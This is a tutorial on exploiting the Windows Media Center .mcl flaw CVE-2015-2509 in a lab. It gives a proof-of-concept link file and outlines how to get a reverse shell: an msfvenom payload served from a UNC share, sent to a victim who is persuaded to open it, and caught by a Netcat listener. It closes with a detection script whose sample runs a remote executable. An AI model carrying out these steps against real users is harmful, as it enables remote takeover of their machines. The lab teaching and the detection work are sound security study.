In this article we briefly introduce reverse shells and the Windows Media Center vulnerability CVE-2015-2509, and then walk through in detail how the vulnerability is exploited.

0x01 Reverse shell

Everyone is familiar with the shell: it is nothing more than a command-line interface. Classified by platform, shells fall roughly into two categories, web-level and system-level. Classified by connection direction, they divide into active and passive connections: an active connection is a bind shell, a passive connection is a reverse shell, which is the subject of this article. The two are explained below.

With a bind shell, the user binds a shell (for example bash) to a local port, so anyone on the network can connect to that port and send commands. A reverse shell works the other way round: the remote computer sends its shell out to a specific user instead of binding it to a port. When the remote machine sits behind a firewall or similar, the reverse shell technique becomes very useful. Often, once attackers have compromised a server, they set up a reverse shell so that they can later reach the remote computer easily through it; in plain terms, they leave a backdoor.

0x02 The CVE-2015-2509 vulnerability

The vulnerability was found in Windows Media Center. The following is quoted from Microsoft's description of the vulnerability:

· If Windows Media Center opens a specially crafted Media Center link (.mcl) file that references malicious code, the vulnerability could allow remote code execution. An attacker who successfully exploits this vulnerability could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

· To exploit this vulnerability, an attacker would have to convince a user to install an .mcl file on the local computer, which in turn references malicious code, most likely from an attacker-controlled location. The security update addresses the vulnerability by correcting how Media Center link files are processed.

Now we begin to introduce the specific method of exploiting the vulnerability.

0x03 Building the exploit environment

The tools used in this article are:

• VirtualBox
• Kali Linux, running in VirtualBox
• A Windows 7 system, running in VirtualBox

Note that when connecting Kali and Windows 7, the network adapter mode should be set to "Host Only Adapter".

0x04 Testing for the vulnerability

To test for the vulnerability, open Notepad on the Windows system and enter the following:

run="c:\windows\system32\calc.exe">

Then save the file, taking care to give it the .mcl extension, i.e. the Media Center link (.mcl) file type.
Figure 1: The newly created calc.mcl file

For someone as lazy as the author, there is an even easier way: download the corresponding Python script from exploit-db and run it to obtain the PoC file. The script is available at: https://www.exploit-db.com/exploits/38151/ Running it generates a file named Music.mcl, whose contents are exactly the same as the file we created with Notepad.
Figure 3: Running calc.mcl

0x05 Popping a shell

Next we describe how to exploit this vulnerability. According to Microsoft, to exploit it an attacker must convince a user to install an .mcl file on the local computer, which then references malicious code, most likely from an attacker-controlled location. The specific steps needed for successful exploitation are:

1. The attacker must create a malicious executable file;
2. This file must be reachable through a UNC path so that the malicious .mcl file can fetch it;
3. Create a malicious .mcl file and send it to the victim;
4. Set up a listener;
5. When the victim opens the .mcl file, we get a shell.

So the first thing to do is to create the malicious file on our machine and make it accessible through a UNC path; in this case our malicious .mcl file fetches it, and when it is executed it returns a reverse shell. Note that to create a malicious executable that returns a reverse shell, we can use msfvenom with the "windows/shell_reverse_tcp" payload, using port 443. In addition, I also created an SMB share on the attacking machine to host the file. The final version of the exploit.mcl file that will be delivered to the victim is shown below.
We need to find a way to deliver this exploit.mcl file to the victim and get him to open it. Configure Netcat to listen on port 443, because our payload uses that port.

Figure 4: Making Netcat listen on port 443

With that done, open the exploit.mcl file, as shown below.
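From the defender's side, the trait that both the calc.mcl test file (0x04) and the UNC-hosted exploit.mcl (0x05) share is a run= attribute that launches a program, so a simple triage check is to scan .mcl files for that attribute and rank the target by where it points. The script below is an added example, not code from the article or from the exploit-db script; the `<application>` element, the sample host 192.0.2.10 and the file names in SAMPLES are constructed for illustration.

```python
import re
from typing import Dict, List

# Matches a run= attribute in Media Center link (.mcl) content. The article's
# PoC uses run="c:\windows\system32\calc.exe"; straight and curly quotes accepted.
RUN_ATTR = re.compile(r'\brun\s*=\s*["“”]([^"“”]*)["“”]', re.IGNORECASE)

# UNC path (\\server\share\...), the delivery method described in step 2 of 0x05.
UNC_PATH = re.compile(r'^\\\\[^\\]+\\')


def classify_run_target(target: str) -> str:
    """Return a severity label for the program an .mcl file would launch."""
    t = target.strip().lower()
    if UNC_PATH.match(t):
        return "high"      # executable fetched from a remote share
    if t.endswith((".exe", ".bat", ".cmd", ".ps1", ".vbs", ".js")):
        return "medium"    # local program launched through the link file
    return "low"


def scan_mcl(text: str) -> List[Dict[str, str]]:
    """Return one finding per run= attribute present in .mcl content."""
    findings = []
    for m in RUN_ATTR.finditer(text):
        target = m.group(1)
        findings.append({"target": target,
                         "severity": classify_run_target(target)})
    return findings


# Constructed samples (not taken from the article): the shape of the calc.mcl
# PoC, a payload hosted on a UNC share as in step 2, and a link with no run=.
SAMPLES = {
    "calc.mcl": '<application run="c:\\windows\\system32\\calc.exe"/>',
    "exploit.mcl": '<application run="\\\\192.0.2.10\\share\\update.exe"/>',
    "benign.mcl": '<application url="https://example.invalid/mc"/>',
}

if __name__ == "__main__":
    for name, content in SAMPLES.items():
        print(name, scan_mcl(content))
```

Point the scanner at mail attachments or a download folder to flag .mcl files before a user double-clicks them; anything rated "high" combines the vulnerable file type with the remote-share delivery the article relies on.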